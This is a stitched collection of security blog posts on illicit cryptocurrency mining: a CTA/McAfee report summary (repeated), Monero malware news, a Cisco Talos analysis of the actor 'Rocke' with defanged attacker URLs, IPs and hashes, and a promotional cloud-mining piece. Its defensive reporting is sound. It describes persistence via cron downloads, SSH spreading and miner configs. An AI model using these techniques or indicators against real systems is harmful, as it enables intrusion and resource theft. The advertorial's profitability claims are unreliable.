With some nation-states already turning to cryptocurrencies to solve economic issues, it is likely that some nation-states will use illicit mining to gain revenue. State-sponsored actors have already been implicated in the theft of cryptocurrencies, as McAfee has reported. Legitimately mined cryptocurrency has been implicated in obfuscating state-sponsored cyber operations, hiding purchases of VPN accounts, servers, and domain registrations.

Conclusion

“The Illicit Cryptocurrency Joint Analysis” represents the first joint industry initiative to educate enterprises and consumers about the growing threat of cryptocurrency mining. By improving security postures and adhering to proper security practices, we can increase the difficulty of these attacks succeeding, thus disrupting malicious behavior. Illicit cryptocurrency mining is not a fad. This problem will likely grow in relation to the value of cryptocurrencies. Current infection methods will give way to new techniques and exploits. The attraction of stealing cryptocurrencies may lead actors to develop targeted attacks against private implementations of blockchain as they become more prevalent. For more on illicit cryptomining threats, read the introductory blog, key findings summary, and the full report to learn about this important research.

The post Cyber Threat Alliance Releases Analysis of Illicit Cryptocurrency Mining appeared first on McAfee Blogs.

McAfee Blogs: Cyber Threat Alliance Releases Analysis of Illicit Cryptocurrency Mining

In response to the explosive increase in cryptomining campaigns in Q4 2017, the Cyber Threat Alliance has formed a cryptomining subcommittee to assess the threat. This committee comprises expert researchers from major cybersecurity companies, including McAfee. The committee has now released “The Illicit Cryptocurrency Joint Analysis,” an in-depth report on the current state of unlawful cryptomining. In the report we explain what led to the recent rise in cryptomining-based attacks, their impact, defense recommendations, and predictions for future evolution of the attack. As members of the Cyber Threat Alliance and the cybersecurity community, we hope that individuals and enterprises can use our research to protect themselves from this threat and improve global security.

The Rise of Illicit Cryptocurrency Mining

To understand the cryptomining threat we need to go back only to late 2017 and early 2018 to see the dramatic growth of cryptomining incidents. Since 2017, the combined data of several CTA members shows a 459% increase in detections of mining malware.

(Figure numbers are out of sequence. They are borrowed from the CTA report.)

The increase of mining malware positively correlates with the growth of the value of coins. Specifically, in late 2017 we saw the value of Bitcoin soar to US$20,000 per coin. Anything with a high value attracts cybercriminals, and cryptocurrencies experienced some of the most dramatic volatility ever of any currency. Cybercriminals were early adopters of cryptocurrencies and use them to fuel underground economies. They have increasingly turned to mining to increase their funds by stealing the computer power of their victims. This theft is also referred to as cryptojacking.

Cryptocurrency and Mining 

Cryptocurrencies have become an increasingly popular alternative to traditional electronic money (e-money). E-money is based on a fiat currency such as the U.S. dollar. One of the most common examples is prepaid credit cards, which stand for the backing currency without the need for physical cash. Cryptocurrencies are generally not backed by a fiat currency. In fact, they are considered decentralized—meaning there is no central authority.

Monero has several advantages over Bitcoin in terms of privacy and anonymity; this makes it a favorite among bad actors. Beyond anonymity concerns, resources required to mine Monero are significantly lower, enabling more users to participate and increasing the profitability of botnets.

The act of generating the coin is called mining, which is using system resources to solve a complex mathematical problem. Most major coins employ a “proof of work” that uses CPU resources to solve. Large groups of miners, including botnets, can amass their resources, called pool mining, on a single problem. The mining operations result in a solved mathematical equation that returns newly minted coins to the system and validates new transactions.

The State of Illicit Cryptocurrency Mining

Current incidents of illicit cryptomining occur through compiled executables. This practice is called binary-based mining. In the context of the browser, the practice is called browser-based mining. Binary-based cryptomining malware is delivered as a payload, often using spam or exploit kits. Open-source tools often facilitate mining. XMRig is a legitimate tool for mining Monero, yet is also frequently used by malicious actors for illicit cryptomining.

The most common browser-based miner is Coinhive. Used legitimately, it offers an alternative to ad revenue by monetizing system resources. However, it has been widely used without informing users. On occasion the owner of the service is unaware of the mining code; this was the case with a recent attack against both Facebook Messenger and Starbucks Wi-Fi. As of July 2, PublicWWW yielded at least 23,000 websites hosting Coinhive code.

An example of Coinhive script embedded within a website.

Beyond using browsers to gather system resources, malware authors have become increasingly sophisticated in other ways. They have taken advantage of widespread vulnerabilities such as EternalBlue to propagate, or have implemented other techniques for evasion. The Smominru attack was a very profitable campaign leveraging this approach. It used “living off the land” techniques to evade detection and increase its ability to mine Monero.

Impacts of Illicit Cryptocurrency Mining

Cryptomining may have an impact on both the short- and long-term security of an organization or user. Three primary impact areas include:

  • Potential security flaws that can lead to additional attacks
  • Physical damage
  • Impacts to business operations and productivity

If a device is used in an unauthorized way, there is evidence of a potential security flaw that needs to be addressed. In late 2017, misconfigured devices using FTP led to hundreds of thousands of Monero miners on consumer-grade devices. Bad actors can and have used these same flaws for additional attacks against the systems.

Physical damage is also a concern. The CPU-intensive operation of mining will produce excess heat and power consumption. For small devices the immediate concern is battery life. However, for large systems, especially data centers, the activity can increase the failure rate of components; this can have a major effect on the system. Ultimately this may lead to costly repairs or increased hardware requirements to support the expanded load.

Organizations may also see a hit to business operations. Mass-computing projects present a similar concern, albeit for more altruistic purposes. Folding@Home, a medical research project aimed at understanding proteins, can be installed to use computer resources to help the research. However, business operations may be impacted by a loss of productivity or additional costs. Many businesses prohibit installing these types of computing projects to protect against unexpected costs and disruptions.

Recommended Best Practices

Fortunately, the defense against cryptomining is very similar to that against other threats. Cryptomining malware uses the same tools and methods; thus maintaining good security practices goes a long way. These include analysis of non-typical network traffic, and properly configuring and patching systems. A few additional steps specific to cryptomining:

  • Monitor abnormal power consumption and CPU activity
  • Search logs for related mining strings such as Crypto, Coinhive, XMR, Monero, and cpuminer
  • Block mining pool communications
  • Use browser extensions to protect against browser-based cryptocurrency mining

For a more comprehensive list, including recommended Snort rules, see the Recommended Best Practices section of the report.

The Evolution of Illicit Mining

Illicit cryptocurrency mining appears to have a positive correlation with Bitcoin value. As long as cryptocurrencies such as Bitcoin have value, we expect bad actors will continue to mine for profits. Although public cryptocurrencies like Bitcoin may be closely tied to monetary value, private or custom blockchains are also at risk and also need to prepare against future attacks.

Private blockchains, including non-currency-related ones, may carry unique risks. Large blockchains such as Bitcoin are considered immutable due to the difficulty of changing historical ledger data. Private blockchains inherently lack the same scale of adoption and thus may be more susceptible to attacks. The 51% attack is a well-known threat that can take advantage of a smaller network and have a severe impact on the blockchain’s integrity.

With some nation-states already turning to cryptocurrencies to solve economic issues, it is likely that some nation-states will use illicit mining to gain revenue. State-sponsored actors have already been implicated in the theft of cryptocurrencies, as McAfee has reported. Legitimately mined cryptocurrency has been implicated in obfuscating state-sponsored cyber operations, hiding purchases of VPN accounts, servers, and domain registrations.

Conclusion

“The Illicit Cryptocurrency Joint Analysis” represents the first joint industry initiative to educate enterprises and consumers about the growing threat of cryptocurrency mining. By improving security postures and adhering to proper security practices, we can increase the difficulty of these attacks succeeding, thus disrupting malicious behavior. Illicit cryptocurrency mining is not a fad. This problem will likely grow in relation to the value of cryptocurrencies. Current infection methods will give way to new techniques and exploits. The attraction of stealing cryptocurrencies may lead actors to develop targeted attacks against private implementations of blockchain as they become more prevalent. For more on illicit cryptomining threats, read the introductory blog, key findings summary, and the full report to learn about this important research.

The post Cyber Threat Alliance Releases Analysis of Illicit Cryptocurrency Mining appeared first on McAfee Blogs.



McAfee Blogs

Hackers Exploited Flaw In EOSBet Smart Contract To Steal 44,000 EOS

Once again, the crypto world faced another cyber attack losing several thousands of dollars to hackers. This time, the hackers

Hackers Exploited Flaw In EOSBet Smart Contract To Steal 44,000 EOS on Latest Hacking News.

Two New Monero Malware Attacks Target Windows and Android Users

Researchers spotted two new Monero malware attacks targeting Windows and Android devices that hide in plain sight and masquerade as legitimate application updates.

Quick Heal Security Labs discovered the new “invisible” Monero mining infection trying to hide on Windows PCs. Once installed, this self-extracting executable unpacks a VBS script, extraction utility, password-protected archive and batch file in the C:/ProgramFiles/Windriverhost directory. It then launches ouyk.vbs to maintain persistence and xvvq.bat to keep the computer on by modifying the PowerCFG command.

Finally, it runs the driverhost.exe mining program, which mines for Monero, while xvvq.bat regularly checks for analysis and antivirus tools using the tasklist command. The infection vector is currently unknown, but Quick Heal speculated that spear phishing and malvertising are likely culprits.

Meanwhile, as noted by Fortinet, the Android/HiddenMiner.A!tr malware attempts to compromise Android devices by posing as an update to the Google Play Store. If installed on an emulator or virtual machine, it shuts down to avoid analysis. If installed on a mobile device, it activates and asks for administrative privileges. If not granted, the malware will continue asking for permission until users allow installation.

Monero Malware Hides in Plain Sight

Along with efforts to avoid analysis, Quick Heal noted that the Monero malware also limits central processing unit (CPU) usage to 35 percent for all mining activity. Given the persistence of the malware and the low CPU cap, users may not encounter the system performance issues and application lag commonly associated with mining attacks, improving the malware’s ability to go undetected for long periods of time.

On the other hand, the HiddenMiner malware is problematic for Android users because it appears in the Google Play Store as an update to the Store itself. As a result, users aren’t surprised by requests for admin rights since the “update” seemingly comes from Google.

How to Mitigate the Threat of Monero Malware

Shutting down these Monero malware tools requires keeping devices up to date and regularly checking desktops for indicators of compromise (IoCs). As noted by IBM X-Force Exchange, the HiddenMiner malware won’t work on Android 7.0 or later thanks to a change in Android PacKage (APK) format that introduced a new signing mechanism. Malware attempting to execute on devices running 7.0 or later will instead return an error message.

IBM security professionals also recommend targeting common IoCs to detect mining malware. As noted by Quick Heal, a flaw in the xvvq.bat file means it only kills driverhost.exe if taskmgr.exe is running — making it easier for security teams to track down the driverhost.exe IoC and take action to remove the malware.

Sources: Quick Heal Security Labs, Fortinet

The post Two New Monero Malware Attacks Target Windows and Android Users appeared first on Security Intelligence.

Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners

A new threat actor is leveraging a varied tool kit and multiple payloads to distribute cryptomining malware, including Monero miners.

In April, Cisco Talos observed a new threat actor named Rocke using western and Chinese Git repositories to deliver cryptomining malware to honeypots that were vulnerable to an Apache Struts vulnerability.

Researchers detected Rocke conducting a similar campaign in July. In that operation, the threat actor communicated with an HTTP File Server (HFS) hosting 11 files. Two of those files — “TermsHost.exe” and “Config.json” — were the executables or configuration files for Monero miners. Many of the other hosted assets were shell scripts responsible for downloading and executing the miners or for killing processes that are commonly associated with other cryptomining malware or cryptomining in general.

Cryptomining Malware Continues to Grow

Rocke’s attack campaigns represent the latest offensives in an ongoing surge of cryptomining malware. In the first quarter of 2018, McAfee Labs detected a 629 percent increase in these threats, with the total number of detected samples rising from 400,000 to more than 2.9 million.

This growth coincides with a FireEye report that found a sharp increase in underground conversations containing cryptocurrency mining-related keywords beginning in 2017 and continuing through the first quarter of 2018.

These findings are also consistent with a sixfold increase in attacks involving embedded mining tools, which IBM Managed Security Services (MSS) observed between January and August 2017.

Defending Against Monero Miners

Security professionals can defend their organizations against threat actors that aim to spread Monero miners by scanning for the indicators of compromise (IoCs) identified in Cisco Talos’ report. Organizations should also consider implementing security best practices that offer blanket protection against malware and other digital threats. These controls should include the creation of a patch prioritization plan for security weaknesses affecting servers and other critical IT assets.

Sources: Cisco Talos, McAfee Labs, FireEye

The post Researchers Observe Threat Actor Using Varied Tools and Payloads to Distribute Monero Miners appeared first on Security Intelligence.

Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys

Someone compromised a Google Chrome extension with malicious code designed to snoop on users’ account credentials and cryptocurrency private keys. On 4 September, a security researcher who goes by the name “SerHack” tweeted out a warning about version 3.39.4 of the Chrome extension for MEGA.nz, a cloud storage and file sharing service. !!! WARNING !!!!!!! […]… Read More

The post Compromised Chrome Extension Snooped on Users’ Credentials, Cryptocurrency Private Keys appeared first on The State of Security.

Top cloud mining trends of 2018: altcoins, ASIC chips and machine learning

Despite the recent downward trends, the cryptocurrency boom goes on. The most popular coins, such as Bitcoin and Ethereum, are widely accepted as payment. As the number of miners in these cryptocurrencies’ networks increases, the competition grows – sending the hash calculations difficulty up. It’s not an easy time for mining, and experts suggest that its future lies in the cloud.

Before, cloud mining was a simpler way to enter the crypto mining market without making large investments. Now, in some cases, it is the only way. Popular cryptocurrencies are becoming less and less profitable to mine independently – or balancing on the edge of unprofitable, as in the case of Bitcoin. To mine successfully today, we have to mine effectively. This means using specialized equipment and optimizing the process by all available means.

What’s up, Bitcoin?

Bitcoin is the first and, up to this day, the most wanted coin. Just a few years ago you could mine BTC on a regular home PC, but now it’s impossible. High demand started a crazy equipment race, and in this kind of competition big players win.

To stay in the game, today’s bitcoin miners need to make large investments and perform constant power upgrades. Some take advantage of their location, but most of the solo miners have little flexibility as for where to build a rig.

With the emergence of application-specific integrated circuit (ASIC) chips, which are more efficient than GPUs, the stakes raised high. The actual cost of solving the blocks is getting close to the amount of the reward, which poses a problem even for cloud BTC mining.

It was the reason why many individual miners turned to emerging or ASIC-resistant coins, which promised smaller reward, but also less competition. Still, with a proper approach, even Bitcoin mining remains profitable. The key is efficiency: increasing the power and lowering the overall cost of mining. It will also work for less popular coins, increasing the total revenue for the miners.

How to get the highest ROI in cloud mining

Hashtoro.com is aimed at Bitcoin, Ethereum and Litecoin cloud mining. As these cryptocurrencies are in wide use now, the project was carefully created with all the aforementioned issues in mind. Here are the top trends the team has picked to develop a profitable cloud mining system for popular coins:

  • cutting electricity costs by using renewable energy,
  • using ASIC miners with immersion cooling,
  • using cutting-edge technology to optimize the mining process.

First, Hashtoro uses renewable sources of energy to power their equipment. The farms are located in European countries with access to cheaper, clean electricity. The excess heat will be used to heat water for local communities, which cuts the energy expenses even more.

Second, ASIC miners with immersion cooling are used for mining, and the team also plans to create their own ASIC chip in the near future to optimize the process even more. It allows to keep the mining cost as low as possible and offer Hashtoro’s clients cheaper contracts.

Third, due to the high volatility of the crypto market, it is hard to give any long-term prognoses on rate dynamics. At the beginning of this year Ethereum and Litecoin were leading the race, but when their prices dropped, Bitcoin came to the fore once again.

The project’s software is based on cutting-edge machine learning and neural network technologies. “The system determines which currency is more profitable to mine at a given time and dynamically switches to it. It also chooses the appropriate pool to make the highest profit. This way the miners will gain the most from the hashrate they buy”, – comments Alexander Petersons, product director of Hashtoro.

At the moment, the joint cryptocurrencies market capitalization is around 254 billion US dollars. It is almost three times less than the 830 billion maximum we saw in January, but we can be sure: cryptocurrencies are here to stay. Under certain conditions, the crypto market can enter the new stage of growth very soon. In the following months we will see more cloud mining services appear. And with the right approach – regardless of all the challenges we face at the moment – mining will remain not just an interesting hobby, but also a good source of income.

The post Top cloud mining trends of 2018: altcoins, ASIC chips and machine learning appeared first on TechWorm.

Rocke: The Champion of Monero Miners


This post was authored by David Liebenberg.


Summary


Cryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor.

In this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors.

Introduction


Talos has written widely about the issue of cryptomining malware and how organizations should protect systems against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as "Rocke" came to our attention.

Rocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners.

Early campaigns


This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability.

Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named "c-999." Subsequently, the Gitee user page transitioned to "c-888." Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named "c-18."

The repositories on both Gitee and GitLab were identical. All the repositories had a folder called "ss" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner.

Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file "logo.jpg" from "3389[.]space." This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename "java." The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if "h32" or "h64" is used to invoke "java."

Although we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform.

Recent campaign


In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

We observed a wget request from our Struts2 honeypot for a file named "0720.bin" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting "0720.bin" along with 10 additional files: "3307.bin," "a7," "bashf," "bashg," "config.json," "lowerv2.sh," "pools.txt," "r88.sh," "rootv2.sh" and "TermsHost.exe." We set about examining these files.


Screenshot of HFS system



We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listens on TCP port 7001 by default.

Both "0720.bin" and "3307.bin" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset.

Hard-coded password



"A7" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as "cranberry," "yam," or "kworker"), as well as mining in general (such as "minerd" and "cryptonight"). It detects and uninstalls various Chinese AV, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a file from GitHub called "libprocesshider," which hides a file called "x7" using the ID preloader. The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading "a7" again from the actor's HFS at 118[.]24[.]150[.]172, and execute it.

Extract of Source Code of "a7"




"Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor "Rocke" (note that for MinerGate, an email can be used in place of a Monero wallet number — it's simply the login email for the MinerGate platform). "Pools.txt" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first.

"Bashf" is a variant of XMR-stak while "bashg" is a variant of XMRig.



"Lowerv2.sh" and "rootv2.sh" are similar shell scripts that attempt to download and execute the mining malware components "bashf" and "bashg," hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk.

"R88.sh" is a shell script that installs a cron job and attempts to download "lowerv2.sh" or "rootv2.sh."

"TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls." The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system.

The payload appears to be similar to one used by the Iron Cybercrime Group, as reported by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can asses with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.

The actor


Through Rocke's MinerGate Monero wallet email rocke@live.cn, we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a leak of user information from the Chinese security site FreeBuf that showed that a user named "rocke" was associated with the email jxci@vip.qq.com. This suggested that they were one in the same. [4]

Rocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language.

The majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the "jx" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.

The GitHub


We identified a GitHub page apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one repository folder, we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner.



We found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May.

We also found an additional repository through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it.

The files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads.





One of the JavaScript files in the repository, named "command.js," uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file "dDNLQrsBUE.url" dropped by "TermsHost.exe."

Rocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers.

Conclusion


Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.

Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.

IOCs:



Earlier campaign:



Attacking IPs targeting Struts:



52[.]167[.]219[.]168: Attacking IP using repo at gitlab
120[.]55[.]226[.]24: Attacking IP using repo at gitee

Attacking IP targeting WebLogic:



27[.]193[.]180[.]224

Attacking IPs targeting ColdFusion:



112[.]226[.]250[.]77
27[.]210[.]170[.]197
112[.]226[.]74[.]162

Domains


3389[.]space

URLs


hxxps://gitee[.]com/c-999/ss/raw/master/ss/a
hxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json
hxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir
hxxps://gitee[.]com/c-999/ss/raw/master/ss/h32
hxxps://gitee[.]com/c-999/ss/raw/master/ss/upd
hxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64
hxxps://gitee[.]com/c-999/ss/raw/master/ss/h64
hxxps://gitee[.]com/c-999/ss/raw/master/ss/x
hxxps://gitee[.]com/c-999/ss/raw/master/ss/run
hxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg
hxxps://gitee[.]com/c-888/ss/raw/master/ss/a
hxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d
hxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/x
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/run
hxxps://gitee[.]com/c-888/ss/raw/master/ss/upd
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd
hxxps://gitee[.]com/c-888/ss/raw/master/ss/x
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d
hxxps://gitee[.]com/c-888/ss/raw/master/ss/h64
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/a
hxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json
hxxps://gitee[.]com/c-888/ss/raw/master/ss/run
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir
hxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64
hxxps://gitee[.]com/c-888/ss/raw/master/ss/h32
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64
hxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz
hxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg

Hashes:


Logo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a
a: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb
cron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe
dir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027
h32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161
h64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf

logo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b

logo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a

run: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5
upd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b
x (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5
x86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612

More recent campaign:



IPs


123[.]249[.]9[.]149: Issues get request for 0720.bin
118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn

Domains:


sydwzl[.]cn
blockbitcoin[.]com: Reached out to by Install.exe
dazqc4f140wtl[.]cloudfront[.]net: file server
3g2upl4pq6kufc4m[.]tk: file server
d3goboxon32grk2l[.]tk: file server
enjoytopic[.]tk: file server
realtimenews[.]tk: file server
8282[.]space: older C2

Domains registered to Rocke (not all are necessarily malicious):



5-xun[.]com
88180585[.]com
firstomato[.]com
jxtiewei[.]com
ncyypx[.]net

URLs


hxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe
hxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=12275&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com
hxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Hashes


55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin
38066751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin
89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe
d341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7
442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf
7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg
7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh
2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt
ba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json
7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh
d44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh
35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe
654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO
F808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY
725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct
d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png
ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png


How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.

